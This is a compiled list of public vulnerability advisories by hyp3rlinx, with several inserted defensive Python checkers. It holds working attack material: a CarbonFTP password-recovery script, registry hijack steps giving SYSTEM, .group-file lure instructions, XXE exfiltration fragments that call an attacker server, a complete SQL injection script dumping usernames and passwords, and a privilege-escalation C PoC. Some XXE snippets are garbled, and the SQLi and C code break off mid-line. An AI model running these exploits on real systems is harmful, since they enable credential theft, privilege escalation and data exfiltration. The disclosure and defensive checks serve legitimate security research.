Neowise CarbonFTP v1.4 Insecure Proprietary Password Encryption CVE-2020-6857

2020-01-20 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
 

[Vendor]
www.neowise.com


[Product]
CarbonFTP v1.4

CarbonFTP is a file synchronization tool that syncs local files with a remote FTP
server and vice versa. It provides a step-by-step wizard to select the folders to be
synchronized, the direction of the synchronization and an option to set file masks
that limit the transfer to specific file types. Settings can be saved as projects so
they can be quickly re-used later.

Download: https://www.neowise.com/freeware/
Hash: 7afb242f13a9c119a17fe66c6f00a1c8


[Vulnerability Type]
Insecure Proprietary Password Encryption


[CVE Reference]
CVE-2020-6857


[Affected Component]
Password Encryption


[Impact Escalation of Privileges]
true


[Impact Information Disclosure]
true


[Security Issue]
CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded,
weak encryption key. The key for locally stored FTP server passwords is embedded in
the binary. Each pair of password bytes is taken as a hex value, converted to
decimal, and the key "97F" (2431 decimal) is added to the result. The key 97F appears
to be the same for every copy of the executable on every system. Finally, the
passwords are stored as decimal values.

If a user chooses to save the project, the passwords are stored in ".CFTP" local
configuration files. They can be found under
"C:\Users\\AppData\Roaming\Neowise\CarbonFTPProjects".

e.g.

Password=STRING|"2086721956209392195620939"

Observing some very short password examples we see interesting patterns:

27264 27360 27360 27360 27360=   a
27520 27617 27617 27617 27617=   b
27266 27616 27360 27361 27616=   aab
27521 27616 27616 27616 27616=   ba

Password encryption/decryption is as follows.

Encryption process example.
484C as decimal is the value 18508
97F hex to decimal is the value 2431 (encrypt key)
18508 + 2431 = 20939, so the stored value 20939 represents the two ASCII characters
"H" (0x48) and "L" (0x4C). Note that the 16-bit word is written to memory
little-endian (mov word ptr [esi],ax in the loop below), so the byte order in the
decrypted buffer is "LH".

To decrypt we just perform the reverse of the operation above.
20939 - 2431 = 18508
Next, convert the decimal value 18508 to hex and we get 484C.
Finally, convert the hex value 484C to ASCII to retrieve the plaintext characters "HL".

CarbonFTP passwords shorter than nine characters are padded by repeating the
password until the buffer reaches nine bytes.

The two-char password "XY" in encrypted form "2496125048250482504825048" is padded
with "XY" until reaching a length of nine bytes, "XYXYXYXYX".

Similarly, the password "HELL" is "2086721956209392195620939" and is again padded,
since its length is less than nine bytes.

Decrypting the padded text alone therefore yields several candidates, e.g.
"HELLHELL | HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH". The stored data removes
the ambiguity, though: in every sample on this page the low byte of the first decoded
word is the plaintext length (0x6101 for "a", 0x6103 for "aab", 0x4804 for "HELL",
0x5802 for "XY"), so the real password is simply the first N bytes after it.
Passwords of nine bytes or more are not padded at all and decrypt in one shot.

For example, the 17-character password stored as the encrypted string
"219042273422734224782298223744247862350210947" (it decodes to "LOOOOONGPASSWORD!")
is longer than nine bytes and is recovered directly, with no candidate passwords.

From offset 0047DA6F to 0047DAA0 is the loop that performs the password decryption.
Using the same password "HELL" as example.

BPX @47DA6F

0047DA6F | 8D 45 F0       | lea eax,dword ptr ss:[ebp-10] |
0047DA72 | 50             | push eax                      |
0047DA73 | B9 05 00 00 00 | mov ecx,5                     |
0047DA78 | 8B D3          | mov edx,ebx                   |
0047DA7A | 8B 45 FC       | mov eax,dword ptr ss:[ebp-4]  | [ebp-4]:"2086721956209392195620939"
0047DA7D | E8 F6 6B F8 FF | call carbonftp.404678         |
0047DA82 | 83 C3 05       | add ebx,5                     |
0047DA85 | 8B 45 F0       | mov eax,dword ptr ss:[ebp-10] | [ebp-10]:"20867"
0047DA88 | E8 AF AD F8 FF | call carbonftp.40883C         |
0047DA8D | 2B 45 F8       | sub eax,dword ptr ss:[ebp-8]  | ;<=== BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431
0047DA90 | 66 89 06       | mov word ptr ds:[esi],ax      |
0047DA93 | 83 C6 02       | add esi,2                     |
0047DA96 | 8B 45 FC       | mov eax,dword ptr ss:[ebp-4]  |
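The decoder below is an added example written for this page, not code from the advisory or from Neowise. It implements the recovery described above against the samples on this page: five decimal digits per 16-bit word (the mov ecx,5 / add ebx,5 in the loop), the key 0x97F subtracted, and the word stored little-endian as mov word ptr [esi],ax does. Read that way, byte 0 of the buffer is the plaintext length in every sample (0x01 for "a", 0x03 for "aab", 0x04 for "HELL", 0x02 for "XY", 0x11 for the 17-character sample), so the padded candidates can be cut back to the real password. The `passwords_from_project` helper, its regex for the `Password=STRING|"..."` line, and the refusal to encrypt even-length passwords longer than nine bytes (no sample shows the trailing pad byte) are assumptions.

```python
import re

KEY = 0x97F     # 2431: the hard-coded key (sub eax,[ebp-8] in the decrypt loop)
PAD_LEN = 9     # passwords shorter than nine bytes are repeated out to nine
CHUNK = 5       # the loop copies five decimal digits per 16-bit word


def decode_words(enc: str) -> bytes:
    """Undo the stored form: 5-digit decimal chunks -> (value - KEY) -> little-endian words."""
    if not enc.isdigit() or len(enc) % CHUNK:
        raise ValueError("ciphertext must be a multiple of five decimal digits")
    out = bytearray()
    for i in range(0, len(enc), CHUNK):
        word = int(enc[i:i + CHUNK]) - KEY
        if not 0 <= word <= 0xFFFF:
            raise ValueError(f"chunk {enc[i:i + CHUNK]} out of range: wrong key or corrupt data")
        out += word.to_bytes(2, "little")   # mov word ptr [esi],ax writes the low byte first
    return bytes(out)


def decrypt(enc: str) -> str:
    """Recover the plaintext; byte 0 of the buffer is the real length, the rest is the
    password cycled out to nine bytes (or the whole password when it is longer)."""
    buf = decode_words(enc)
    length, body = buf[0], buf[1:]
    return body[:length].decode("latin-1")


def encrypt(pw: str) -> str:
    """Inverse of decrypt for the layouts the advisory's samples document."""
    raw = pw.encode("latin-1")
    if not 1 <= len(raw) <= 0xFF:
        raise ValueError("length must fit the one-byte length field")
    body = (raw * PAD_LEN)[:PAD_LEN] if len(raw) < PAD_LEN else raw
    buf = bytes([len(raw)]) + body
    if len(buf) % 2:
        # Assumption: the only sample longer than nine bytes has an odd length (17 chars
        # -> 18 bytes); the pad byte for even lengths is undocumented, so refuse to guess.
        raise ValueError("undocumented padding for even-length passwords longer than nine bytes")
    return "".join(str(int.from_bytes(buf[i:i + 2], "little") + KEY)
                   for i in range(0, len(buf), 2))


# Assumption: one "Password=STRING|"<digits>"" line per stored credential, as in the
# .CFTP excerpt above.
PASSWORD_LINE = re.compile(r'Password=STRING\|"(\d+)"')


def passwords_from_project(cftp_text: str) -> list:
    """Return every plaintext FTP password found in the text of a .CFTP project file."""
    return [decrypt(m.group(1)) for m in PASSWORD_LINE.finditer(cftp_text)]


if __name__ == "__main__":
    for enc in ("2086721956209392195620939",
                "2496125048250482504825048",
                "219042273422734224782298223744247862350210947"):
        print(enc, "->", decrypt(enc))
```

Running the block against the three stored strings on this page prints HELL, XY and LOOOOONGPASSWORD!; the length byte is why no candidate list is needed.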

Trend Micro Security 2019 (Consumer) Multiple Products Security Bypass Protected Service Tampering CVE-2019-19697

2020-01-20 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-SECURITY-BYPASS-PROTECTED-SERVICE-TAMPERING.txt
[+] ISR: ApparitionSec  


[Vendor]
www.trendmicro.com


[Product]
Trend Micro Security 2019 (Consumer) Multiple Products


Trend Micro Security provides comprehensive protection for your devices.
This includes protection against ransomware, viruses, malware, spyware, and 
identity theft.


[Vulnerability Type]
Security Bypass Protected Service Tampering


[CVE Reference]
CVE-2019-19697


[Security Issue]
Trend Micro Maximum Security is vulnerable to arbitrary code execution because it
allows the creation of a registry key targeting a process that runs as SYSTEM.
This lets malware gain elevated privileges to take over and shut down services that
require SYSTEM privileges, such as Trend Micro's "Asmp" service
"coreServiceShell.exe", which does not allow Administrators to tamper with it.

This could allow an attacker or malware to gain elevated privileges and tamper with
protected services by disabling them or otherwise preventing them from starting.
Note that administrator privileges are required to exploit this vulnerability.


[CVSS 3.0 Scores: 3.9]


[Affected versions]
Platform Microsoft Windows
Premium Security 2019 (v15)
Maximum Security 2019 (v15)
Internet Security 2019 (v15)
Antivirus + Security 2019 (v15)


[References]
https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124090.aspx


[Exploit/POC]
1) Create an entry for the following registry key targeting "PtWatchdog.exe" and
set the debugger string value to an arbitrary executable to gain SYSTEM privileges.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtWatchdog.exe

2) Create a string value named "debugger" under the key and give it the path of the
executable you wish to run as SYSTEM.

3) Restart the machine or wait until the service restarts; you then get SYSTEM and
can disable the Trend Micro endpoint security coreServiceShell.exe service.
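An audit for the key the steps above abuse, as an added example (not the advisory's or Trend Micro's code): it parses the text of `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s` and reports every Debugger value, flagging those that point outside the Windows and Program Files trees. The sample dump, the PtWatchdog.exe debugger path and the trusted-directory allow-list are constructed assumptions; on a real host, feed the `reg query` output to `find_ifeo_debuggers`.

```python
import re

IFEO_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

# Constructed stand-in for `reg query "<IFEO key>" /s` output (not captured from a real host):
# one planted debugger on PtWatchdog.exe, one unrelated value, one legitimate debugger.
SAMPLE_REG_QUERY = rf"""{IFEO_KEY}\PtWatchdog.exe
    debugger    REG_SZ    C:\Users\Public\notmalware.exe

{IFEO_KEY}\iexplore.exe
    DisableExceptionChainValidation    REG_DWORD    0x0

{IFEO_KEY}\notepad.exe
    Debugger    REG_SZ    "C:\Program Files\Windows Kits\10\Debuggers\x64\windbg.exe"
"""

# reg query prints values as "<indent><name>    <REG_type>    <data>"
VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$")

# Assumption: a debugger installed on purpose lives under one of these trees.
TRUSTED_DEBUGGER_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def find_ifeo_debuggers(reg_text: str) -> list:
    """Return (image name, debugger path) for every Debugger value in the dump."""
    hits, image = [], None
    for line in reg_text.splitlines():
        if line.startswith("HKEY_"):
            image = line.rsplit("\\", 1)[-1]     # last key component is the hijacked image
            continue
        m = VALUE_RE.match(line)
        if m and m.group("name").lower() == "debugger":   # the value name is case-insensitive
            hits.append((image, m.group("data").strip().strip('"')))
    return hits


def is_suspicious(debugger_path: str) -> bool:
    """True when the debugger binary sits outside the allow-listed directories."""
    return not debugger_path.lower().startswith(TRUSTED_DEBUGGER_DIRS)


def audit_ifeo(reg_text: str) -> list:
    """(image, debugger, suspicious) triples, ready to print or ship to a SIEM."""
    return [(img, dbg, is_suspicious(dbg)) for img, dbg in find_ifeo_debuggers(reg_text)]


if __name__ == "__main__":
    for image, debugger, bad in audit_ifeo(SAMPLE_REG_QUERY):
        print(("[!] " if bad else "[ ] ") + f"{image} -> {debugger}")
```

Because the same page shows a Program Files directory that every user can write to, treat the allow-list as a triage hint rather than a verdict: any Debugger value on an image you did not configure yourself deserves a look, and the one on PtWatchdog.exe is exactly what this advisory describes.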


[Network Access]
Local


[Severity]
Low


[Disclosure Timeline]
Vendor Notification: October 8, 2019
Vendor confirms issue: October 28, 2019
Vendor release date: January 14, 2020
January 16, 2020 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx


Trend Micro Security (Consumer) Multiple Products Persistent Arbitrary Code Execution CVE-2019-20357

2020-01-20 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-PERSISTENT-ARBITRARY-CODE-EXECUTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec 
 

[Vendor]
www.trendmicro.com


[Product(s)]
Trend Micro Security (Consumer) Multiple Products


Trend Micro Security provides comprehensive protection for your devices.
This includes protection against ransomware, viruses, malware, spyware, and 
identity theft.


[Vulnerability Type]
Persistent Arbitrary Code Execution


[CVE Reference]
CVE-2019-20357


[CVSSv3 Scores: 6.7]


[Security Issue]
Trend Micro Security can potentially allow an attacker to use a malicious program to
escalate privileges to SYSTEM integrity and attain persistence on a vulnerable system.


[Product Affected Versions]
Platform Microsoft Windows

Premium Security 2019 (v15) and 2020 (v16)

Maximum Security
2019 (v15) and 2020 (v16)

Internet Security
2019 (v15) and 2020 (v16)

Antivirus + Security
2019 (v15) and 2020 (v16)


[References]
https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124099.aspx

[Exploit/POC]
Compile C test code "Program.c"

#include <stdio.h>
#include <stdlib.h>

int main(void){
 puts("Done!");
 system("pause");
 return 0;
}

1) Place the compiled binary under the c:\ dir.
2) Reboot the machine; the coreServiceShell.exe service loads and executes our
binary with SYSTEM integrity.



[Network Access]
Local


[Severity]
Medium



[Disclosure Timeline]
Vendor Notification: October 8, 2019
vendor advisory: January 15, 2020
January 16, 2020 : Public Disclosure




hyp3rlinx


Microsoft Windows .Group File / URL Field Code Execution

2019-12-31 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.GROUP-FILE-URL-FIELD-CODE-EXECUTION.txt
[+] twitter.com/hyp3rlinx
[+] apparitionsec@gmail
[+] ISR: Apparition Security


[Vendor]
www.microsoft.com


[Product]
Windows ".Group" File Type

Group files are a collection of contacts created by Windows Contacts, an embedded
contact management program included with Windows. A .group file contains a list of
contacts saved into a group, which can be used to create a mailing list for sending
email messages to multiple addresses at once.


[Vulnerability Type]
URL Field Code Execution


[CVE Reference]
N/A


[Security Issue]
Windows ".group" files are related to Contact files and suffer from unexpected code
execution when clicking the "Contact Group Details" tab's Website "Go" button. This
happens if the website URL field points to an executable file. It is the same type
of vulnerability affecting Windows .contact files, which remains unfixed as of the
time of this writing and has a Metasploit module available.

[References]
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt

Therefore, attacker-supplied executables can run unexpectedly for the user, who
thinks they are visiting a website when they click the Website "Go" button.
Moreover, if the files are compressed using certain archive utilities it may be
possible to skirt security warnings even when the executable was downloaded from
the internet or copied from a network share.

This exploit requires a bit more user interaction than the previously disclosed
.contact file vulnerability, as the GROUP file will complain if it is not in the
Contacts directory. Advisory released for the sake of completeness and user
security awareness.


[Exploit/POC]
1) Create a Windows .group file.

2) Create a directory named "http".

3) Create an executable file with a .com extension (rename .exe to .com), e.g.
"www.microsoft.com", and place it in the "http" dir alongside the .group file.

4) Point the website URL at the executable using path traversal, e.g.
"http.\www.microsoft.com", which becomes the website address in the .group file
(Windows drops the trailing dot from "http." when resolving the path, so it lands in
the "http" directory).

Note: the directory traversal can also point to other dirs like
..\Downloads\http.\microsoft.com, but the downside is that the URL looks very sketchy.

5) Package it up in an archive (.rar etc.).

6) Send the .group file via email, or have it downloaded, and lure the user into
placing the archive in the "c:\User\\Contacts" directory.

7) Open the archive and double click the .group file (Windows will complain with an
error to move it to the Contacts folder if it is not within that dir already), then
click the website address "Go" button.

The attacker's executable will run instead of navigating to a website, as the end
user would expect.
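A check for the field the steps above abuse, as an added example (not the advisory's code and not Windows Contacts' own validation): given the string in a contact's Website field, it returns the reasons the value should not be handed to the "Go" button, i.e. anything that is not an absolute http(s) URL, contains a backslash or "..", has a trailing-dot path component such as "http." (Windows drops the dot and opens the real "http" folder), or names a target with an executable extension such as .com. The extension list is an assumption.

```python
from urllib.parse import urlsplit
import posixpath

# Assumption: extensions Windows will execute when the value is handed to an "open" verb.
EXEC_EXTS = {".com", ".exe", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".vbe",
             ".js", ".jse", ".wsf", ".wsh", ".hta", ".msi", ".lnk", ".ps1"}


def website_field_problems(value: str) -> list:
    """Reasons a Contacts 'Website' value must not be opened; an empty list means it is a
    plain absolute http(s) URL whose path names nothing executable."""
    problems = []
    parts = urlsplit(value)
    scheme = parts.scheme.lower()
    if "\\" in value:
        problems.append("contains a backslash: a filesystem path, not a URL")
    if scheme not in ("http", "https"):
        problems.append(f"scheme {scheme or '(none)'} is not http/https")
    if not parts.netloc:
        problems.append("no host: resolved relative to the Contacts folder")
    # Without scheme+host the whole value is a local path, so inspect all of it.
    raw_path = parts.path if scheme and parts.netloc else value
    segments = [s for s in raw_path.replace("\\", "/").split("/") if s]
    for seg in segments:
        if seg == "..":
            problems.append("parent-directory traversal ('..')")
        elif seg.endswith(".") and seg != ".":
            problems.append(f"segment {seg!r} has a trailing dot; Windows opens {seg.rstrip('.')!r}")
    if segments:
        ext = posixpath.splitext(segments[-1])[1].lower()
        if ext in EXEC_EXTS:
            problems.append(f"target {segments[-1]!r} has executable extension {ext}")
    return problems


def website_field_is_safe(value: str) -> bool:
    return not website_field_problems(value)


if __name__ == "__main__":
    for candidate in (r"https://www.microsoft.com/", r"http.\www.microsoft.com",
                      r"..\Downloads\http.\microsoft.com"):
        print(candidate, "->", website_field_problems(candidate) or "ok")
```

The advisory's payload "http.\www.microsoft.com" trips four of the five rules at once (no scheme, no host, backslash, trailing-dot segment) before the .com extension is even considered, which is why a launcher that only wants to open a website should insist on an absolute http(s) URL rather than trying to blacklist paths.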


[Severity]
High


[Disclosure Timeline]
Vendor Notification: Same type vuln affecting .contact files disclosed January 
16, 2019, status remains unfixed.
January 1, 2020 : Public Disclosure



hyp3rlinx


Microsoft Windows Media Center XXE MotW Bypass (Anniversary Edition)

2019-12-03 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WINDOWS-MEDIA-CENTER-MOTW-BYPASS-XXE-ANNIVERSARY-EDITION.txt
[+] ISR: Apparition Security 
 

[Vendor]
www.microsoft.com


[Product]
Microsoft Windows Media Center

Windows Media Center is a discontinued digital video recorder and media player 
created by Microsoft.
Media Center was first introduced to Windows in 2002 on Windows XP Media Center.


[Vulnerability Type]
XML External Entity MotW Bypass (Anniversary Edition)


[CVE Reference]
N/A


[Security Issue]
This vulnerability was originally released by me back on December 4, 2016, yet 
remains unfixed.
Now, to make matters worse, I will let you know that "mark-of-the-web" (MotW) does not
matter here; it is just ignored. Meaning, if the .MCL file is downloaded from the
internet it gets the MotW, but files are still exfiltrated.

Therefore, I am releasing this "anniversary edition" XXE with important MotW
information.

This is a fully working remote information disclosure vulnerability that still 
affects Windows 7.
Windows 7 is near end of life this January, yet it is still used by many 
organizations.
Furthermore, it seems that Windows 8.1 (Pro) can also run Windows Media Center, but I
have not tested it.

Host the "FindMeThatBiotch.dtd" DTD file in the web-root of the attacker server
(port 80 etc.). Download the ".mcl" file using Microsoft Internet Explorer.

Check the MotW in the directory where you downloaded the .mcl file with dir /r and
note that the Zone.Identifier:$DATA stream exists.
Open the file and BOOM! watch the files leaving... still vulnerable after all these
years lol.

OS: Windows 7 (tested successfully) and possibly Windows 8.1 Pro


[Exploit/POC]
1) "M$-Wmc-Anniversary-Motw-Bypass.mcl"

# PoC


/FindMeThatBiotch.dtd">
%junk;
%param666;
%FindMeThatBiotch;
]>


2) "FindMeThatBiotch.dtd"
/%data666;'>">


3) Auto exploit PHP .mcl file downloader.

/M$-Wmc-Anniversary-Motw-Bypass.mcl';
header('Content-Type: application/octet-stream');
header("Content-Transfer-Encoding: Binary"); 
header("Content-disposition: attachment; filename=\"" . basename($url) . "\""); 
readfile($url);
?>


4) python -m SimpleHTTPServer 80



[POC Video URL]
https://www.youtube.com/watch?v=zcrATpBNAZ0


[Network Access]
Remote



[Severity]
High


[Disclosure Timeline]
Vendor Notification:  December 4, 2016
MSRC "wont fix"
Dec 2, 2019 : Re-Public "unfixed anniversary" Disclosure




hyp3rlinx


NAPC Xinet Elegant 6 Asset Library Web Interface v6.1.655 Pre-Auth SQL Injection 0Day CVE-2019-19245

2019-12-02 Thread apparitionsec
[+] Credits: hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/NAPC-XINET-ELEGANT-6-ASSET-LIBRARY-WEB-INTERFACE-PRE-AUTH-SQL-INJECTION.txt
[+] ISR: ApparitionSec  
 

[Vendor]
www.napc.com


[Product]
Xinet Elegant 6 Asset Library Web Interface v6.1.655

Web based interface for xinet asset management solution.


[Vulnerability Type]
Pre-Auth SQL Injection


[CVE Reference]
CVE-2019-19245


[Security Issue]
NAPC Xinet (interface) Elegant 6 Asset Library v6.1.655 allows pre-authentication
error-based SQL injection via the /elegant6/login LoginForm[username] field when
double quotes are used. The vulnerable version seems to be old, but it may still be
possible to find it deployed, as I have.

Vulnerable Parameter: LoginForm[username] (POST) Method.


[Exploit/POC]
import requests,time,re,sys,argparse

#NAPC Xinet Elegant 6 Asset Library v6.1.655
#Pre-Auth SQL Injection 0day Exploit
#By hyp3rlinx
#ApparitionSec
#==
#This will dump tables, usernames and passwords in vulnerable versions
#REQUIRE PARAMS: LoginForm[password]=[rememberMe]=0[username]=SQL
#SQL INJECTION VULN PARAM --> LoginForm[username]
#

IP=""
PORT="80"
URL=""
NUM_INJECTS=20
k=1
j=0
TABLES=False
CREDS=False
SHOW_SQL_ERROR=False


def vuln_ver_chk():
    global IP, PORT
    TARGET = "http://"+IP+":"+PORT+"/elegant6/login"
    response = requests.get(TARGET)
    if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content):
        print "[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655."
        return True
    print "[!] Version not vulnerable :("
    return False


def sql_inject_request(SQL):
    global IP, PORT
    URL = "http://"+IP+":"+PORT+"/elegant6/login"

    tmp=""
    headers = {'User-Agent': 'Mozilla/5.0'}
    payload = {'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL}
    session = requests.Session()

    res = session.post(URL,headers=headers,data=payload)
    idx = res.content.find('CDbCommand')  # Start of SQL Injection Error in response
    idx2 = res.content.find('key 1')      # End of SQL Injection Error in response

    return res.content[idx : idx2+3]


#Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc
def inc():
    global k,j
    while j < NUM_INJECTS:
        j+=1
        if k !=1:
            k+=1
        return str(j)+','+str(k)


#Cut the leaked value out of the "Duplicate entry '...' for key 1" error text
def tidy_up(results):
    global CREDS
    idx = results.find("'")
    if idx != -1:
        idx2 = results.rfind("'")
        if not CREDS:
            return results[idx + 1: idx2 -2]
        else:
            return results[idx + 2: idx2]


def breach(i):
    global k,j,NUM_INJECTS,SHOW_SQL_ERROR
    result=""

    #Dump Usernames & Passwords
    if CREDS:
        if i % 2 == 0:
            target='username'
        else:
            target='password'

        SQL=('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'+target+'))'
             'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group by x)a)-- -')

        if not SHOW_SQL_ERROR:
            result = tidy_up(sql_inject_request(SQL))
        else:
            result = sql_inject_request(SQL)+"\n"
        print "[+] Dumping "+target+": "+result

    #Dump Tables
    if TABLES:
        while j < NUM_INJECTS:
            nums = inc()
            SQL=('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()'
                 'limit '+nums+'),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -')

            if not SHOW_SQL_ERROR:
                result = tidy_up(sql_inject_request(SQL))
            else:
                result = sql_inject_request(SQL) + "\n"

            print "[+] Dumping Table... " +result
            time.sleep(0.3)


def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--ip_address", help=".")
    parser.add_argument("-p", "--port", help="Port, Default is 80")
    parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.")
    parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.")
    parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max SQL Injection Attempts, Default is 20.")
    parser.add_argument("-s", "--show_sql_errors", nargs="?", const=&quo

Max Secure Anti Virus Plus v19.0.4.020 Insecure Permissions CVE-2019-19382

2019-12-02 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec  
 

[Vendor]
www.maxpcsecure.com


[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020

File hash: ab1dda23ad3955eb18fdb75f3cbc308a
msplusx64.exe


[Vulnerability Type]
Insecure Permissions


[CVE Reference]
CVE-2019-19382


[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the 
installation directory.
Local attackers or malware running at low integrity can replace a .exe or .dll 
file to achieve privilege escalation.

C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated 
Users:(ID)F
   BUILTIN\Users:(ID)F
   NT AUTHORITY\SYSTEM:(ID)F
   BUILTIN\Administrators:(ID)F
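A check that turns the cacls listing above into findings, as an added example (not the advisory's or Max Secure's code): it parses cacls output, pairs each ACE with its file, and reports every file where a low-privilege group (Users, Authenticated Users, INTERACTIVE, Everyone) holds Full, Change or Write rights, which is the condition the PoC that follows relies on. The listing embedded in the block is constructed from the 7z.dll entry above plus an invented Hardened.dll showing what a correct ACL looks like; the group list is an assumption.

```python
import re

# Constructed cacls output: the 7z.dll entry from the advisory plus an invented
# Hardened.dll whose ACL is what a Program Files binary should look like.
SAMPLE_CACLS = r"""C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F
C:\Program Files\Max Secure Anti Virus Plus\Hardened.dll BUILTIN\Users:(ID)R
                                                         NT AUTHORITY\SYSTEM:(ID)F
                                                         BUILTIN\Administrators:(ID)F
"""

# One ACE as cacls prints it: "<principal>:<inheritance flags><rights letter>" at end of line.
ACE_RE = re.compile(
    r"(?P<who>(?:NT AUTHORITY|NT SERVICE|BUILTIN|CREATOR OWNER|[A-Za-z0-9._-]+)\\[A-Za-z0-9 ._-]+|Everyone)"
    r":(?P<flags>(?:\([A-Z]+\))*)(?P<rights>[NRWCF])\s*$")

# Assumption: every local user is a member of these, so a writable ACE for them
# lets a low-integrity process plant a binary.
LOW_PRIV_PRINCIPALS = {"BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users",
                       "NT AUTHORITY\\INTERACTIVE", "Everyone"}
WRITE_RIGHTS = {"F", "C", "W"}   # cacls letters: Full, Change, Write


def parse_cacls(text: str) -> list:
    """(path, principal, rights) for every ACE; indented continuation lines keep the path above."""
    entries, path = [], None
    for line in text.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue                      # blank lines and "(special access:)" detail lines
        if not line[:1].isspace():        # a file's first ACE shares the line with its path
            path = line[:m.start()].rstrip()
        entries.append((path, m.group("who"), m.group("rights")))
    return entries


def find_weak_aces(text: str) -> list:
    """Files that a standard user can overwrite."""
    return [(p, who, r) for p, who, r in parse_cacls(text)
            if who in LOW_PRIV_PRINCIPALS and r in WRITE_RIGHTS]


if __name__ == "__main__":
    for path, who, rights in find_weak_aces(SAMPLE_CACLS):
        print(f"[!] {who} has {rights} on {path}")
```

On a live host, `cacls "C:\Program Files\<product>\*" | python audit.py` style piping of the real listing into `find_weak_aces` gives the same result for every file in the directory; 7z.dll is reported twice (Authenticated Users and Users), Hardened.dll not at all.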


[Affected Component]
Permissions on installation directory


[Exploit/POC]
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"

/* Max Secure Anti Virus Plus PoC By hyp3rlinx */

BOOL PWNED=FALSE;

BOOL FileExists(LPCTSTR szPath){
  DWORD dwAttrib = GetFileAttributes(szPath);
  return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

int main(void){

  /* First run: stash a copy of the legitimate MaxSDUI.exe as 666.tmp */
  if(!FileExists(DISABLED_TARGET)){
    CopyFile(TARGET, TMP, FALSE);
    Sleep(1000);
    CopyFile(TMP, DISABLED_TARGET, FALSE);
    printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
    Sleep(1000);
    printf("[+] Disabled MaxSDUI.exe ...\n");
    Sleep(300);
  }else{
    PWNED=TRUE;   /* second run: we are now executing in place of MaxSDUI.exe */
  }

  if(!PWNED){
    char fname[MAX_PATH];
    DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
